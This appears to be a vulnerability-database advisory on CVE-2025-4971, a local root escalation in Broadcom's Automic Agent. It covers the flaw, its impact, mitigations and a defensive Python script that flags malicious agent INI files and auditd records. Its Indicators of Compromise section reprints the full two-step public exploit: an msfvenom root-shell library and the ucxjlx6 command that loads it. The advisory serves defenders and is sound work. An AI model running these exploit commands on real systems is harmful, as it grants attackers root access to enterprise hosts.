Automic Agent 24.3.0 HF4 - Privilege Escalation
AI Analysis
Technical Summary
CVE-2025-4971 is a local privilege escalation in the Unix/Linux Automic Agent from Broadcom. It is fixed in 24.3.0 HF4 and 21.0.13 HF1; every earlier build on those two release lines is affected (the exploit title names the fixed hotfix level, the vulnerable versions are the ones below it). The Automic Agent is the per-host component of Automic Automation that executes the jobs scheduled by the Automation Engine, so it is installed on a large number of enterprise servers. The root cause is that the agent binary, ucxjlx6, takes its configuration from an INI file named on the command line (ini=<path>) and, when that file sets [MISC] authentication = PAM, loads the shared object named by [PAM] libName into its own process without checking where the library comes from. Because the binary runs with privileges the invoking user does not have (the published exploit only makes sense against a copy that runs with effective uid 0, for example one installed setuid root), any library the caller points it at is loaded and executed at that privilege level. The public exploit (Exploit-DB 52309, Flora Schäfer, 26 May 2025) builds a shared object with msfvenom that, when loaded, calls setuid and setgid and then execs /bin/sh, writes it to /tmp/sh.so, and starts ucxjlx6 with a throw-away INI supplied through shell process substitution (ini=<(...)), so the attacker's configuration never exists on disk as a regular file; that INI sets authentication = PAM and libName = /tmp/sh.so, and the result is a root shell. No agent or Automation Engine credentials are needed, but the attacker must already have a foothold on the host: a local account, or code execution as any user, that can execute ucxjlx6. It is not a remote vulnerability and does not become one without some other way of running commands on the machine. A successful exploit yields full control of the host, so confidentiality, integrity and availability are all affected. No exploitation in the wild has been reported, but the exploit is public, two commands long and trivial to reproduce, which makes it an obvious second stage for any attacker who lands a low-privileged shell on a server running the agent.
Potential Impact
For European organizations the risk is significant because the Automic Agent is widely deployed in enterprise automation and IT operations, typically on servers that also hold business data or credentials for other systems. Successful exploitation turns any unprivileged local account (including a service account compromised through some other application on the same host) into root, which allows attackers to read sensitive data, tamper with scheduled jobs, disrupt critical business processes and move laterally using whatever the agent or the host can reach. That can mean operational downtime, financial loss, GDPR non-compliance and reputational damage. Organizations in finance, manufacturing, telecommunications and government, which lean heavily on job-scheduling and automation tooling, are the most exposed. The fact that no credentials are needed once code can run on the host, combined with a public two-command exploit, lowers the bar for both targeted and opportunistic attacks. Because the agent is usually integrated into larger automation estates, a compromised agent host can also be used to reach the Automation Engine and other agents, so one local compromise can cascade across many systems.
Mitigation Recommendations
1. Upgrade the agent to 24.3.0 HF4 or 21.0.13 HF1 (or a later build on the same release line); these are the fixed versions named in the exploit header. Where an upgrade cannot be scheduled quickly, engage Broadcom support for interim guidance.
2. Check how ucxjlx6 is installed on each host (for example with find / -perm -4000 -name ucxjlx6). If the binary carries the setuid bit, restrict its execute permission to the group that the agent's service account belongs to so that ordinary local users cannot start it at all. Locking down the agent's shipped INI file does not help, because the attacker supplies their own INI on the command line; who may execute the binary is the control that matters.
3. Mount /tmp, /var/tmp and /dev/shm noexec where the platform allows it; dlopen of a library on a noexec mount fails, which breaks the published exploit as written, although an attacker with a writable home directory can still stage the library elsewhere. Application allowlisting that covers shared objects closes that gap more completely.
4. Audit execution of the agent binary (an auditd execve rule keyed on ucxjlx6, or the equivalent in your EDR) and alert when it is started with an ini= argument that points at /dev/fd, /tmp, a home directory or any path outside the agent installation, when a PAM libName refers to a library outside the system library directories, or when the agent process spawns an interactive shell.
5. Segment the network so that agent hosts are only reachable from the Automation Engine and the administrative jump hosts that need them; this limits both the chance of an initial foothold and the lateral movement that follows a root compromise.
6. Feed the above indicators into IDS/IPS and EDR rules so that privilege-escalation attempts are detected and, where possible, blocked at runtime.
7. Brief system administrators and the SOC on the specific technique (attacker-supplied INI, PAM library path) so that reports of odd ucxjlx6 invocations are recognised for what they are.
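As an added illustration of the auditing in items 2 and 4 (example code written for this page, not part of the Exploit-DB entry or of Broadcom's product), the script below applies two offline checks: it parses an agent INI and flags a PAM libName that the privileged ucxjlx6 process would load from a user-writable or non-system location, and it scans auditd EXECVE records for the agent being started with an ini= argument that points at /dev/fd, /tmp or similar. The trusted and untrusted directory lists, the sample INI text and the audit lines are all assumptions constructed for the example.

```python
"""Audit helpers for the CVE-2025-4971 attack pattern: an attacker-supplied
Automic Agent INI that makes the privileged ucxjlx6 process dlopen a shared
object from a location the attacker controls.

  check_agent_ini(text)      - flag a [PAM] libName outside the system library
                               directories (the library the exploit swaps in)
  scan_execve_records(lines) - flag auditd EXECVE records where ucxjlx6 starts
                               with an ini= argument pointing at a user-writable
                               or /dev/fd path (the exploit uses ini=<( ... ))
All INI text and audit lines below are constructed for this example.
"""
import configparser
import os
import re
from typing import Dict, List

# Where a PAM library legitimately lives on common Linux distributions.
# Assumption: extend for your platform and agent install layout.
TRUSTED_LIB_DIRS = ("/lib", "/lib64", "/usr/lib", "/usr/lib64")
# Locations an unprivileged user can write to, plus the /dev/fd paths that the
# exploit's <( ... ) process substitution produces. Assumption: tune per host.
UNTRUSTED_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm", "/home", "/dev/fd", "/proc/self/fd")
AGENT_BINARY = "ucxjlx6"


def _under(path: str, prefixes) -> bool:
    """True if the normalised path is one of the prefixes or lies beneath it.
    normpath collapses '..', so /usr/lib/../../tmp/x.so is judged as /tmp/x.so."""
    norm = os.path.normpath(path)
    return any(norm == p or norm.startswith(p + "/") for p in prefixes)


def check_agent_ini(ini_text: str) -> List[str]:
    """Return a list of findings (empty if clean) for an agent INI."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    # configparser lower-cases option names, so 'libName' is read back as 'libname'.
    auth = cp.get("MISC", "authentication", fallback="").strip()
    lib = cp.get("PAM", "libname", fallback="").strip()
    if auth.upper() != "PAM" or not lib:
        return []  # no PAM library load is configured; nothing for the agent to dlopen
    if not os.path.isabs(lib):
        return [f"[PAM] libName {lib!r} is relative and resolves against the caller's cwd"]
    norm = os.path.normpath(lib)
    if _under(norm, UNTRUSTED_PREFIXES):
        return [f"[PAM] libName {norm} is in a user-writable or transient location"]
    if not _under(norm, TRUSTED_LIB_DIRS):
        return [f"[PAM] libName {norm} is outside the trusted library directories"]
    return []


# auditd writes argv as a0="..." a1="..." (arguments with odd bytes are hex-encoded
# without quotes; those are skipped here for brevity).
_ARG_RE = re.compile(r'\ba\d+="([^"]*)"')
_ID_RE = re.compile(r"msg=audit\(([^)]*)\)")


def scan_execve_records(lines) -> List[Dict[str, str]]:
    """Flag EXECVE records where the agent binary gets an ini= pointing at an
    untrusted path. Returns one dict per hit with the audit id and the path."""
    hits = []
    for line in lines:
        if "type=EXECVE" not in line:
            continue
        args = _ARG_RE.findall(line)
        if not args or os.path.basename(args[0]) != AGENT_BINARY:
            continue
        for arg in args[1:]:
            if not arg.startswith("ini="):
                continue
            path = arg[len("ini="):]
            if not os.path.isabs(path) or _under(path, UNTRUSTED_PREFIXES):
                m = _ID_RE.search(line)
                hits.append({"audit_id": m.group(1) if m else "?", "ini": path})
    return hits


# Constructed sample inputs: the first INI mirrors the layout used by the public exploit.
EXPLOIT_STYLE_INI = """[GLOBAL]
helplib = /dev/null
system = blep
[MISC]
authentication = PAM
[PAM]
libName = /tmp/sh.so
[VARIABLES]
UC_EX_JOB_MD=blep
"""
BENIGN_INI = "[MISC]\nauthentication = PAM\n[PAM]\nlibName = /lib64/libpam.so.0\n"
TRAVERSAL_INI = "[MISC]\nauthentication = PAM\n[PAM]\nlibName = /usr/lib/../../tmp/sh.so\n"
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1748260000.101:2001): argc=2 a0="/opt/automic/agent/bin/ucxjlx6" a1="ini=/opt/automic/agent/bin/ucxjlx6.ini"',
    'type=EXECVE msg=audit(1748260000.102:2002): argc=2 a0="./ucxjlx6" a1="ini=/dev/fd/63"',
    'type=EXECVE msg=audit(1748260000.103:2003): argc=2 a0="/opt/automic/agent/bin/ucxjlx6" a1="ini=/tmp/x.ini"',
    'type=EXECVE msg=audit(1748260000.104:2004): argc=2 a0="/bin/ls" a1="ini=/tmp/x.ini"',
]

if __name__ == "__main__":
    for name, text in (("exploit-style", EXPLOIT_STYLE_INI), ("benign", BENIGN_INI), ("traversal", TRAVERSAL_INI)):
        print(name, check_agent_ini(text))
    for hit in scan_execve_records(SAMPLE_AUDIT_LINES):
        print("suspicious agent start:", hit)
```

On a live host the INI check would additionally stat the library and refuse anything not owned by root or writable by others; the path policy alone already catches the published exploit, the process-substitution variant and the `..` traversal case.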
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Italy, Spain
Indicators of Compromise
- exploit-code:
# Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation
# Date: 26.05.2025
# Exploit Author: Flora Schäfer
# Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation
# Version: <24.3.0 HF4, <21.0.13 HF1
# Tested on: Linux
# CVE : CVE-2025-4971

1. Generate shared object file using msfvenom

$ msfvenom -p linux/x64/exec PrependSetuid=True PrependSetgid=True CMD="/bin/sh" -f elf-so > /tmp/sh.so

2. Run the ucxjlx6 executable as follows

$ ./ucxjlx6 ini=<(echo -e "[GLOBAL]\nhelplib = /dev/null\nsystem = blep\n[MISC]\nauthentication = PAM\n[PAM]\nlibName = /tmp/sh.so\n[VARIABLES]\nUC_EX_JOB_MD=blep")
Technical Details
- Edb Id: 52309
- Has Exploit Code: true
- Code Language: text
Threat ID: 68489d847e6d765d51d52748
Added to database: 6/10/2025, 9:03:00 PM
Last enriched: 6/11/2025, 8:11:30 AM
Last updated: 8/4/2025, 9:00:26 PM
Related Threats
- U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs (Medium)
- U.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog (Medium)
- Cisco ISE 3.0 - Remote Code Execution (RCE) (Critical)
- Cisco ISE 3.0 - Authorization Bypass (Medium)
- projectworlds Online Admission System 1.0 - SQL Injection (Medium)